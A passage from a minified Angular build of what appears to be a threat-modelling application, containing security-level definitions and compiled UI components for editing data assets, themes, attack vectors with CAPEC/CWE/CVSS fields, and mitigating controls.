b1ab","db2383ba-3aba-408b-8317-6c10af37d1ea","d30db9ad-4a71-4e14-bc8f-718834d56e03","d8332abf-0ac2-4096-bde8-02f5716ba15e","b4c58d1f-016b-4244-baf3-e2ee57eff599","88e8ef92-3f66-4c19-8a67-d2a2d97abeb2","926c6b5b-0a1f-4833-a612-97691a10d83f","6cefc8a9-b69b-4197-961c-dbbc27cbd23b","4854fee5-99e3-4c4b-8b53-4c37629005d0","8ed9c57b-fbe4-435a-8036-501cf5a95f3e","98d81760-6978-4372-809a-8303352c53b7","b06635ce-dc29-44de-a719-81829a3962de","72adfa45-cc4e-4539-ad87-99d1f46f4eab","798e83ee-b5ad-46c2-8bd5-58c968e8390a","64064d6d-e701-4ebf-ab84-3f702b32b8ff","d07a5fcc-e3fa-4525-8253-e5463c56a905","1936692f-af1c-4335-b9c4-60ff1da57ae1","0c455f28-1b52-4d02-b358-fc13ae9c2e85","2b6d967f-e572-4e6a-a5dd-11cdce427df4","1cb6a6d6-6c8b-431e-8eaa-5f3604c2e153","08cf1ab2-c34b-473e-a332-4e99c616db7d","8d84eb63-48d8-41e8-aeb1-ef767a5fb572"],"Levels":[{"Name":"Security Level 1","Abbr":"SL1","Description":"Prevent the unauthorized disclosure of information via eavesdropping or causal exposure"},{"Name":"Security Level 2","Abbr":"SL2","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using simple means with low resources, generic skills and low motivation "},{"Name":"Security Level 3","Abbr":"SL3","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using sophisticated means with moderate resources, IACS specific skills and moderate motivation "},{"Name":"Security Level 4","Abbr":"SL4","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using sophisticated means with extended resources, IACS specific skills and high motivation"}]}]}');function Cwe(t,a){if(1&t){const e=Ye();m(0,"button",13),he("click",function(){return be(e),Me(B().myData.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function ywe(t,a){1&t&&(m(0,"mat-hint",14),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function bwe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();V("value",e),C(1),ke(re(2,2,i.GetSensitivity(e)))}}function Mwe(t,a){if(1&t){const e=Ye();m(0,"mat-option",19),he("click",function(){const r=be(e).$implicit;return Me(B(3).SetAssetGroup(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function vwe(t,a){if(1&t&&(m(0,"mat-optgroup",17),s(1,"\n        "),ne(2,Mwe,2,3,"mat-option",18),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Key),C(2),V("ngForOf",e.Value)}}function Awe(t,a){if(1&t&&(m(0,"mat-form-field",0),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",15),s(7,"\n      "),ne(8,vwe,4,2,"mat-optgroup",16),s(9,"\n    "),u(),s(10,"\n  "),u()),2&t){const e=B();C(3),ke(re(4,3,"general.Assets")),C(3),V("value",e.GetAssetGroup()),C(2),V("ngForOf",e.GetAssetGroups())}}function Twe(t,a){if(1&t){const e=Ye();m(0,"table",20),s(1,"\n      "),m(2,"tr")(3,"td")(4,"mat-checkbox",21),he("change",function(){const r=be(e).$implicit,c=B();return Me(c.ImpactCatChanged(c.myData,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("checked",i.myData.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let v5=(()=>{class t{constructor(e,i){this.dataService=i,this.showAssetGroup=!1,e&&(this.myData=e,this.showAssetGroup=!0)}ngOnInit(){if(this.assetGroups=[],this.myData.IsProjectData){const e=this.dataService.Project.GetProjectAssetGroup();let i={Key:e.Name,Value:[e,...e.GetGroupsFlat()]};this.assetGroups.push(i),this.dataService.Project.GetDevices().filter(n=>n.AssetGroup).forEach(n=>{let r={Key:n.Name,Value:[n.AssetGroup,...n.AssetGroup.GetGroupsFlat()]};this.assetGroups.push(r)}),this.dataService.Project.GetMobileApps().filter(n=>n.AssetGroup).forEach(n=>{let r={Key:n.Name,Value:[n.AssetGroup,...n.AssetGroup.GetGroupsFlat()]};this.assetGroups.push(r)})}else this.assetGroups.push({Key:"Assets",Value:[this.dataService.Config.AssetGroups,...this.dataService.Config.AssetGroups.GetGroupsFlat()]})}SetAssetGroup(e){let i=this.GetAssetGroup();i&&i.RemoveMyData(this.myData),e.AddMyData(this.myData)}GetAssetGroups(){return this.assetGroups}GetAssetGroup(){return this.myData.FindAssetGroup()}GetSensitivity(e){return An.ToString(e)}GetSensitivities(){return An.GetKeys()}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Pu,8),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-mydata"]],inputs:{myData:"myData",showAssetGroup:"showAssetGroup"},decls:63,vars:31,consts:[["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill","class","property-form-field",4,"ngIf"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],[3,"label",4,"ngFor","ngForOf"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip","click"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",1),he("ngModelChange",function(r){return i.myData.Name=r}),u(),s(9,"\n    "),ne(10,Cwe,6,3,"button",2),s(11,"\n  "),u(),s(12,"\n  "),m(13,"mat-form-field",3),s(14,"\n    "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n    "),m(19,"input",4),he("ngModelChange",function(r){return i.myData.Number=r}),u(),s(20,"\n    "),ne(21,ywe,3,3,"mat-hint",5),s(22,"\n  "),u(),s(23,"\n  "),it(24,"br"),s(25,"\n  "),m(26,"mat-form-field",6),s(27,"\n    "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n    "),m(32,"textarea",7),he("ngModelChange",function(r){return i.myData.Description=r}),u(),s(33,"\n  "),u(),s(34,"\n  "),it(35,"br"),s(36,"\n  "),m(37,"mat-form-field",0),s(38,"\n    "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n    "),m(43,"mat-select",8),he("valueChange",function(r){return i.myData.Sensitivity=r}),oe(44,"translate"),s(45,"\n      "),ne(46,bwe,3,4,"mat-option",9),s(47,"\n    "),u(),s(48,"\n  "),u(),s(49,"\n  "),it(50,"br"),s(51,"\n  "),ne(52,Awe,11,5,"mat-form-field",10),s(53,"\n  "),m(54,"h3"),s(55),oe(56,"translate"),u(),s(57,"\n  "),m(58,"div",11),s(59,"\n    "),ne(60,Twe,8,4,"table",12),s(61,"\n  "),u(),s(62,"\n"),u()),2&e&&(C(5),ke(re(6,19,"general.Name")),C(3),at("matTooltip",i.myData.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.myData.Name),C(2),V("ngIf",i.myData.Name),C(6),ke(re(17,21,"general.Number")),C(3),at("matTooltip",i.myData.Number),V("ngModel",i.myData.Number),C(2),V("ngIf",i.myData.CheckUniqueNumber()),C(8),ke(re(30,23,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.myData.Description),C(8),ke(re(41,25,"properties.Sensitivity")),C(3),at("matTooltip",re(44,27,i.GetSensitivity(i.myData.Sensitivity))),V("value",i.myData.Sensitivity),C(3),V("ngForOf",i.GetSensitivities()),C(6),V("ngIf",i.showAssetGroup),C(3),ke(re(56,29,"properties.ImpactCategories")),C(5),V("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,oa,br,da,nn,pp,un,jr,Nr,yr,Cg,Go,Xa,Pa,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})(),Oa=(()=>{class t{constructor(e){this.locStorageService=e,this.ThemeChanged=new Tt,this.IsDarkMode=!0,setTimeout(()=>{let i=this.locStorageService.Get(si.DARK_MODE);this.SetDarkMode(null==i?this.IsDarkMode:"true"==i)},100)}get Color2(){return this.IsDarkMode?"#252525":"#F5F5F5"}SetDarkMode(e){this.ThemeChanged.emit(e),this.IsDarkMode=e,this.locStorageService.Set(si.DARK_MODE,String(this.IsDarkMode))}}return t.\u0275fac=function(e){return new(e||t)(At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ewe(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(B(3).attackVector.Name="")}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Dwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",29),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",30),he("ngModelChange",function(n){return be(e),Me(B(2).attackVector.Name=n)}),u(),s(9,"\n      "),ne(10,Ewe,6,3,"button",31),s(11,"\n    "),u(),s(12,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,5,"properties.Name")),C(3),at("matTooltip",e.attackVector.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackVector.Name),C(2),V("ngIf",e.attackVector.Name)}}function xwe(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"mat-option",35),s(3),u(),s(4,"\n              "),Mt()),2&t){const e=a.$implicit;C(2),V("value",e.ID),C(1),ct("\n                  ",e.Name,"\n                ")}}function wwe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n              "),ne(2,xwe,5,2,"ng-container",34),s(3,"\n            "),u()),2&t){const e=B().$implicit;V("label",e.Name),C(2),V("ngForOf",e.SubGroups)}}function Iwe(t,a){if(1&t&&(bt(0),s(1,"\n            "),m(2,"mat-option",35),s(3),u(),s(4,"\n            "),ne(5,wwe,4,2,"mat-optgroup",36),s(6,"\n          "),Mt()),2&t){const e=a.$implicit;C(2),V("value",e.ID),C(1),ct("\n              ",e.Name,"\n            "),C(2),V("ngIf",e.SubGroups&&e.SubGroups.length>0)}}function Rwe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n          "),ne(2,Iwe,7,3,"ng-container",34),s(3,"\n        "),u()),2&t){const e=B().$implicit;V("label",e.Name),C(2),V("ngForOf",e.SubGroups)}}function Swe(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"mat-option",35),s(3),u(),s(4,"\n        "),ne(5,Rwe,4,2,"mat-optgroup",36),s(6,"\n      "),Mt()),2&t){const e=a.$implicit;C(2),V("value",e.ID),C(1),ct("\n          ",e.Name,"\n        "),C(2),V("ngIf",e.SubGroups&&e.SubGroups.length>0)}}function kwe(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",29),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",33),he("selectionChange",function(n){return be(e),Me(B(2).OnGroupChanged(n))}),s(7,"\n      "),ne(8,Swe,7,3,"ng-container",34),s(9,"\n\n    "),u(),s(10,"\n  "),u()}if(2&t){const e=B(2);let i,n;C(3),ke(re(4,4,"general.Group")),C(3),at("matTooltip",null==(i=e.GetAttackVectorGroup())?null:i.Name),V("value",null==(n=e.GetAttackVectorGroup())?null:n.ID),C(2),V("ngForOf",e.GetRootAttackVectorGroups())}}function Pwe(t,a){if(1&t&&(m(0,"mat-option",39),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function Owe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n        "),ne(2,Pwe,2,3,"mat-option",38),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatCategories)}}function Nwe(t,a){if(1&t&&(m(0,"td",40),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);C(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Lwe(t,a){if(1&t){const e=Ye();m(0,"td",8)(1,"mat-checkbox",41),he("change",function(){const r=be(e).$implicit,c=B(2);return Me(c.LifeCycleChanged(c.attackVector.ThreatIntroduced,r))}),u()()}if(2&t){const e=a.$implicit,i=B(2);C(1),V("checked",i.attackVector.ThreatIntroduced.includes(e))}}function zwe(t,a){if(1&t&&(m(0,"td",40),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);C(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Wwe(t,a){if(1&t){const e=Ye();m(0,"td",8)(1,"mat-checkbox",41),he("change",function(){const r=be(e).$implicit,c=B(2);return Me(c.LifeCycleChanged(c.attackVector.ThreatExploited,r))}),u()()}if(2&t){const e=a.$implicit,i=B(2);C(1),V("checked",i.attackVector.ThreatExploited.includes(e))}}function Fwe(t,a){if(1&t&&(m(0,"mat-option",35),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetAttackVectorTypeName(e)))}}function Vwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",13),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",42),he("ngModelChange",function(n){return be(e),Me(B(2).attackVector.AttackTechnique.CAPECID=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,2,"properties.CAPECID")),C(3),V("ngModel",e.attackVector.AttackTechnique.CAPECID)}}function Bwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",13),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",42),he("ngModelChange",function(n){return be(e),Me(B(2).attackVector.Weakness.CWEID=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,2,"properties.CWEID")),C(3),V("ngModel",e.attackVector.Weakness.CWEID)}}function Hwe(t,a){if(1&t&&(m(0,"mat-option",35),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function Uwe(t,a){if(1&t&&(m(0,"mat-card",45),s(1,"\n      "),m(2,"mat-card-title"),s(3),u(),s(4,"\n      "),m(5,"mat-card-content"),s(6,"\n        "),it(7,"app-capec-entry",46),s(8,"\n      "),u(),s(9,"\n    "),u()),2&t){const e=B(3);C(3),ct("CAPEC-",e.attackVector.AttackTechnique.CAPECID,""),C(4),V("capecID",e.attackVector.AttackTechnique.CAPECID)}}function qwe(t,a){if(1&t&&(bt(0),s(1,"\n    "),it(2,"app-cvss-entry",43),s(3,"\n    "),ne(4,Uwe,10,2,"mat-card",44),s(5,"\n  "),Mt()),2&t){const e=B(2);C(2),V("entry",e.attackVector.AttackTechnique.CVSS),C(2),V("ngIf",e.attackVector.AttackTechnique.CAPECID)}}function Gwe(t,a){if(1&t&&(m(0,"mat-card"),s(1,"\n      "),m(2,"mat-card-title"),s(3),u(),s(4,"\n      "),m(5,"mat-card-content"),s(6,"\n        "),it(7,"app-cwe-entry",47),s(8,"\n      "),u(),s(9,"\n    "),u()),2&t){const e=B(3);C(3),ct("CWE-",e.attackVector.Weakness.CWEID,""),C(4),V("cweID",e.attackVector.Weakness.CWEID)}}function jwe(t,a){if(1&t&&(bt(0),s(1,"\n    "),ne(2,Gwe,10,2,"mat-card",1),s(3,"\n  "),Mt()),2&t){const e=B(2);C(2),V("ngIf",e.attackVector.Weakness.CWEID)}}function Qwe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddExistingControl(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function $we(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",48),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedControl=r)}),s(1,"\n          "),m(2,"mat-icon",49),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",50),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"button",51),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveControl(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n          "),m(14,"button",52),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteControl(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,8,e.Name)),C(3),at("matTooltip",re(10,10,"general.Remove")),C(5),at("matTooltip",re(15,12,"general.Delete"))}}function Kwe(t,a){if(1&t&&(m(0,"div",53),s(1,"\n        "),it(2,"app-control",54),s(3,"\n      "),u()),2&t){const e=B(2);C(2),V("control",e.selectedControl)("canEditName",!0)("canEditGroup",!0)}}function Xwe(t,a){if(1&t&&(s(0,"\n          "),it(1,"app-threat-rule",58),s(2,"\n        ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("showAttackVector",!1)("threatRule",e)}}function Ywe(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n        "),m(2,"mat-expansion-panel-header"),s(3,"\n          "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n          "),m(7,"mat-panel-description"),s(8),m(9,"mat-icon"),s(10,"info"),u(),s(11,"\n          "),u(),s(12,"\n        "),u(),s(13,"\n        "),ne(14,Xwe,3,3,"ng-template",57),s(15,"\n      "),u()),2&t){const e=a.$implicit,i=B(3);C(5),ct("\n            ",e.Name,"\n          "),C(3),ct("\n            ",i.GetThreatRestriction(e),"\n            ")}}function Jwe(t,a){if(1&t&&(m(0,"div",55),s(1,"\n    "),m(2,"strong"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-accordion",56),s(7,"\n      "),ne(8,Ywe,16,2,"mat-expansion-panel",34),s(9,"\n    "),u(),s(10,"\n    "),it(11,"br"),s(12,"\n  "),u()),2&t){const e=B(2);C(3),ke(re(4,2,"general.ThreatRules")),C(5),V("ngForOf",e.GetThreatRules())}}function Zwe(t,a){1&t&&(m(0,"div",55),s(1," \n    "),m(2,"strong"),s(3),oe(4,"translate"),u(),s(5,"\n  "),u()),2&t&&(C(3),ke(re(4,1,"pages.config.threatlibrary.noRuleOrQuestion")))}function e8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),ne(2,Dwe,13,7,"ng-container",1),s(3,"\n  "),m(4,"mat-form-field",2),s(5,"\n    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n    "),m(10,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B().attackVector.Description=n)}),u(),s(11,"\n  "),u(),s(12,"\n  "),m(13,"mat-form-field",2),s(14,"\n    "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n    "),m(19,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B().attackVector.Adversaries=n)}),u(),s(20,"\n  "),u(),s(21,"\n  "),ne(22,kwe,11,6,"mat-form-field",4),s(23,"\n  "),m(24,"mat-form-field",2),s(25,"\n    "),m(26,"mat-label"),s(27),oe(28,"translate"),u(),s(29,"\n    "),m(30,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().attackVector.ThreatCategories=n)}),s(31,"\n      "),ne(32,Owe,4,2,"mat-optgroup",6),s(33,"\n    "),u(),s(34,"\n  "),u(),s(35,"\n  "),m(36,"table",7),s(37,"\n    "),m(38,"tr"),s(39,"\n      "),m(40,"td",8)(41,"strong"),s(42),oe(43,"translate"),u()(),s(44,"\n      "),ne(45,Nwe,3,3,"td",9),s(46,"\n    "),u(),s(47,"\n    "),m(48,"tr"),s(49,"\n      "),m(50,"td",8)(51,"strong"),s(52),oe(53,"translate"),u()(),s(54,"\n      "),ne(55,Lwe,2,1,"td",10),s(56,"\n    "),u(),s(57,"\n    "),m(58,"tr"),s(59,"\n      "),m(60,"td",8)(61,"strong"),s(62),oe(63,"translate"),u()(),s(64,"\n      "),ne(65,zwe,3,3,"td",9),s(66,"\n    "),u(),s(67,"\n    "),m(68,"tr"),s(69,"\n      "),m(70,"td",8)(71,"strong"),s(72),oe(73,"translate"),u()(),s(74,"\n      "),ne(75,Wwe,2,1,"td",10),s(76,"\n    "),u(),s(77,"\n  "),u(),s(78,"\n  "),m(79,"mat-form-field",11),s(80,"\n    "),m(81,"mat-label"),s(82),oe(83,"translate"),u(),s(84,"\n    "),m(85,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().attackVector.OriginTypes=n)}),s(86,"\n      "),ne(87,Fwe,3,4,"mat-option",12),s(88,"\n    "),u(),s(89,"\n  "),u(),s(90,"\n  "),ne(91,Vwe,11,4,"ng-container",1),s(92,"\n  "),ne(93,Bwe,11,4,"ng-container",1),s(94,"\n  "),m(95,"mat-form-field",13),s(96,"\n    "),m(97,"mat-label"),s(98),oe(99,"translate"),u(),s(100,"\n    "),m(101,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().attackVector.Severity=n)}),s(102,"\n      "),m(103,"mat-option"),s(104),oe(105,"translate"),u(),s(106,"\n      "),ne(107,Hwe,3,4,"mat-option",12),s(108,"\n    "),u(),s(109,"\n  "),u(),s(110,"\n  "),ne(111,qwe,6,2,"ng-container",1),s(112,"\n  "),ne(113,jwe,4,1,"ng-container",1),s(114,"\n  "),m(115,"div",15),s(116,"\n    "),m(117,"div",16),s(118,"\n      "),m(119,"mat-list",17),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.dropControl(n,r.GetControls()))}),s(120,"\n        "),m(121,"div",18),s(122),oe(123,"translate"),m(124,"button",19),oe(125,"translate"),m(126,"mat-icon"),s(127,"add"),u()(),s(128,"\n          "),m(129,"mat-menu",null,20),s(131,"\n            "),m(132,"button",21),he("click",function(){return be(e),Me(B().AddControl())}),s(133),oe(134,"translate"),u(),s(135,"\n            "),m(136,"button",22),s(137),oe(138,"translate"),u(),s(139,"\n          "),u(),s(140,"\n          "),m(141,"mat-menu",null,23),s(143,"\n            "),ne(144,Qwe,2,1,"button",24),s(145,"\n          "),u(),s(146,"\n        "),u(),s(147,"\n        "),ne(148,$we,19,14,"mat-list-item",25),s(149,"\n      "),u(),s(150,"\n    "),u(),s(151,"\n    "),m(152,"div",26),s(153,"\n      "),ne(154,Kwe,4,3,"div",27),s(155,"\n    "),u(),s(156,"\n  "),u(),s(157,"\n  "),ne(158,Jwe,13,4,"div",28),s(159,"\n  "),ne(160,Zwe,6,3,"div",28),s(161,"\n"),u()}if(2&t){const e=Ti(130),i=Ti(142),n=B();Ct("disable",!n.canEdit),C(2),V("ngIf",n.isShownInDialog),C(5),ke(re(8,47,"properties.Description")),C(3),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.attackVector.Description),C(6),ke(re(17,49,"properties.Adversaries")),C(3),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.attackVector.Adversaries),C(3),V("ngIf",n.isShownInDialog||!n.canEdit),C(5),ke(re(28,51,"general.ThreatCategories")),C(3),V("value",n.attackVector.ThreatCategories),C(2),V("ngForOf",n.GetThreatCategoryGroups()),C(10),ke(re(43,53,"pages.config.attackvector.introduced")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(53,55,"pages.config.attackvector.during")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(63,57,"pages.config.attackvector.exploitable")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(73,59,"pages.config.attackvector.during")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(83,61,"properties.AttackVectorType")),C(3),V("value",n.attackVector.OriginTypes),C(2),V("ngForOf",n.GetAttackVectorTypes()),C(4),V("ngIf",n.attackVector.OriginTypes.includes(2)),C(2),V("ngIf",n.attackVector.OriginTypes.includes(1)),C(5),ke(re(99,63,"properties.Severity")),C(3),V("value",n.attackVector.Severity),C(3),ke(re(105,65,"properties.selectNone")),C(3),V("ngForOf",n.GetSeverityTypes()),C(4),V("ngIf",n.attackVector.OriginTypes.includes(2)),C(2),V("ngIf",n.attackVector.OriginTypes.includes(1)),C(6),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),C(3),ct("",re(123,67,"general.Controls")," \n          "),C(2),at("matTooltip",re(125,69,"general.Add")),V("matMenuTriggerFor",e),C(9),ke(re(134,71,"general.New")),C(3),V("matMenuTriggerFor",i),C(1),ke(re(138,73,"general.Existing")),C(7),V("ngForOf",n.GetPossibleControls()),C(4),V("ngForOf",n.GetControls()),C(6),V("ngIf",n.selectedControl),C(4),V("ngIf",n.GetThreatRules().length>0),C(2),V("ngIf",0==n.GetThreatRules().length)}}let Qg=(()=>{class t{constructor(e,i,n,r,c){this.theme=n,this.dataService=r,this.translate=c,this.canEdit=!0,this.isShownInDialog=!1,e&&(this.attackVector=e,this.isShownInDialog=!0),null!=i&&(this.canEdit=i.Value)}get attackVector(){return this._attackVector}set attackVector(e){this._attackVector=e,this.selectedControl=null}ngOnInit(){}GetAttackVectorTypes(){return eM.GetTypes()}GetAttackVectorTypeName(e){return eM.ToString(e)}LifeCycleChanged(e,i){const n=e.indexOf(i);n>=0?e.splice(n,1):e.push(i)}GetLifeCycles(){return y2.GetKeys()}GetLifeCycleName(e){return y2.ToString(e)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}GetRootAttackVectorGroups(){return this.dataService.Config.ThreatLibrary.SubGroups}GetAttackVectorGroup(){return this.dataService.Config.FindGroupOfAttackVector(this.attackVector)}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetThreatRules(){return this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.AttackVector)||void 0===i?void 0:i.ID)==this.attackVector.ID})}GetThreatRestriction(e){return Vg.ToString(e,this.dataService,this.translate)}GetPossibleControls(){return this.dataService.Config.GetControls().filter(e=>!e.MitigatedAttackVectors.includes(this.attackVector))}AddExistingControl(e){e.AddMitigatedAttackVector(this.attackVector)}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);e.AddMitigatedAttackVector(this.attackVector),this.selectedControl=e}RemoveControl(e){e.RemoveMitigatedAttackVector(this.attackVector),e==this.selectedControl&&(this.selectedControl=null)}DeleteControl(e){this.dataService.Config.DeleteControl(e),e==this.selectedControl&&(this.selectedControl=null)}GetControls(){return this.dataService.Config.GetControls().filter(e=>e.MitigatedAttackVectors.includes(this.attackVector))}OnGroupChanged(e){let i=this.dataService.Config.GetAttackVectorGroup(e.value),n=this.dataService.Config.FindGroupOfAttackVector(this.attackVector);n&&n.RemoveAttackVector(this.attackVector),i.AddAttackVector(this.attackVector)}dropControl(e,i){const n=this.dataService.Config.GetControls().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetControls().indexOf(i[e.currentIndex]);Qs(this.dataService.Config.GetControls(),n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Wp,8),Ee(ff,8),Ee(Oa),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-attack-vector"]],inputs:{attackVector:"attackVector",canEdit:"canEdit"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["appearance","fill","class","property-form-field",4,"ngIf"],["multiple","",3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],[2,"margin-top","10px"],[2,"text-align","center"],["style","padding: 0 3px 0 3px",4,"ngFor","ngForOf"],["style","text-align: 